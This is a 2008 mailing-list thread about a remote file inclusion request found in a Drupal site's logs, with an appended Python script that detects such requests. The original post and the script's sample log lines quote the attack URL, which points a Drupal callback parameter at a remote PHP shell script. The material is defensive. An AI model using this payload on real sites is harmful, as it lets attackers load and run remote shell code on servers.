Hi, I have seen this URL in my watchdog logs:
drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
where http://my3dwork.com/images/on.txt is a PHP shell script.
Any 0-day bug?
I have tried to execute it on my site without "drupal/" and the result is that the browser is redirected to the homepage.
M.
Hi,
The most important thing here is that when you have a potential security issue, the proper way to submit it is documented on http://drupal.org/security-team, which can also be found via http://drupal.org/security. If you send the potential exploit to a public channel like a listserv or the Drupal.org issue queue, that makes the job of the security team and all other Drupal users much harder, because everyone has to scramble to find a fix and get it installed as soon as possible.
On Jan 6, 2008 6:17 PM, michel michel@ziobudda.net wrote:
> drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
> where http://my3dwork.com/images/on.txt is a PHP shell script.
> Any 0-day bug?
This is not a bug in Drupal per se, but rather a PHP bug. Because the Security Team was seeing a few reports of logs like this, we decided to make a "Public Service Announcement" back in October: http://drupal.org/node/184313. That announcement describes the nature of the problem and the proper actions to take to prevent the attack from succeeding on your site.
Regards, Greg
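For anyone else who wants to find requests like the one quoted in this thread in their own logs, here is a small scanner added as an example; it is not code from the thread, from Drupal, or from the PSA. It assumes access-log lines in the common Apache/nginx "combined" layout (watchdog entries are formatted differently and would need a different line parser), decodes percent-encoded and double-encoded query strings, and flags any array-style parameter name (such as _menu[callbacks][1][callback]) whose value is a remote URL. The log lines in SAMPLE_LOG are constructed for the example; the payload URL is the one quoted above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside an Apache/nginx "combined" style access-log entry
# (assumed layout; adjust the pattern for other log formats).
_REQUEST = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (?P<target>\S+) HTTP/'
)
# A value that names a remote resource rather than a local one.
_REMOTE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# An array-style parameter name such as _menu[callbacks][1][callback].
_ARRAY_KEY = re.compile(r"^[A-Za-z_]\w*\[")


def _fully_decode(s, rounds=3):
    """Undo percent-encoding repeatedly so a double-encoded payload
    (%2568ttp... -> %68ttp... -> http...) is still recognised."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def suspicious_params(target):
    """Return (name, value) pairs from the query string of one request
    target where an array-style parameter carries a remote URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        name, value = _fully_decode(name), _fully_decode(value)
        if _ARRAY_KEY.match(name) and _REMOTE.match(value):
            hits.append((name, value))
    return hits


def scan_log(lines):
    """Scan log lines and return (line_number, client_ip, name, value)
    for every suspicious parameter found."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = _REQUEST.match(line)
        if not match:
            continue  # not a request line we understand; skip it
        for name, value in suspicious_params(match.group("target")):
            findings.append((number, match.group("ip"), name, value))
    return findings


# Constructed sample log lines (not taken from the original thread).
SAMPLE_LOG = [
    # The request quoted in the thread, with raw brackets in the query string.
    '192.0.2.10 - - [06/Jan/2008:18:17:02 +0100] "GET /drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt? HTTP/1.0" 302 0 "-" "-"',
    # Same payload, fully percent-encoded and without the "drupal/" prefix.
    '192.0.2.10 - - [06/Jan/2008:18:17:05 +0100] "GET /?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http%3A%2F%2Fmy3dwork.com%2Fimages%2Fon.txt%3F HTTP/1.0" 302 0 "-" "-"',
    # Ordinary Drupal page request.
    '198.51.100.7 - - [06/Jan/2008:18:20:11 +0100] "GET /?q=node/12&page=1 HTTP/1.1" 200 4821 "-" "-"',
    # A remote URL in a plain (non-array) parameter is not this pattern.
    '198.51.100.7 - - [06/Jan/2008:18:21:30 +0100] "GET /?q=user/login&destination=http://www.example.com/ HTTP/1.1" 200 3310 "-" "-"',
]


if __name__ == "__main__":
    for number, ip, name, value in scan_log(SAMPLE_LOG):
        print(f"line {number}: {ip} sent {name} = {value}")
```

The last sample line shows the deliberate narrowness of the check: a full URL in a plain parameter such as destination is common in normal Drupal traffic, so only array-style names carrying remote URLs are reported, which is the shape of the request that prompted this thread.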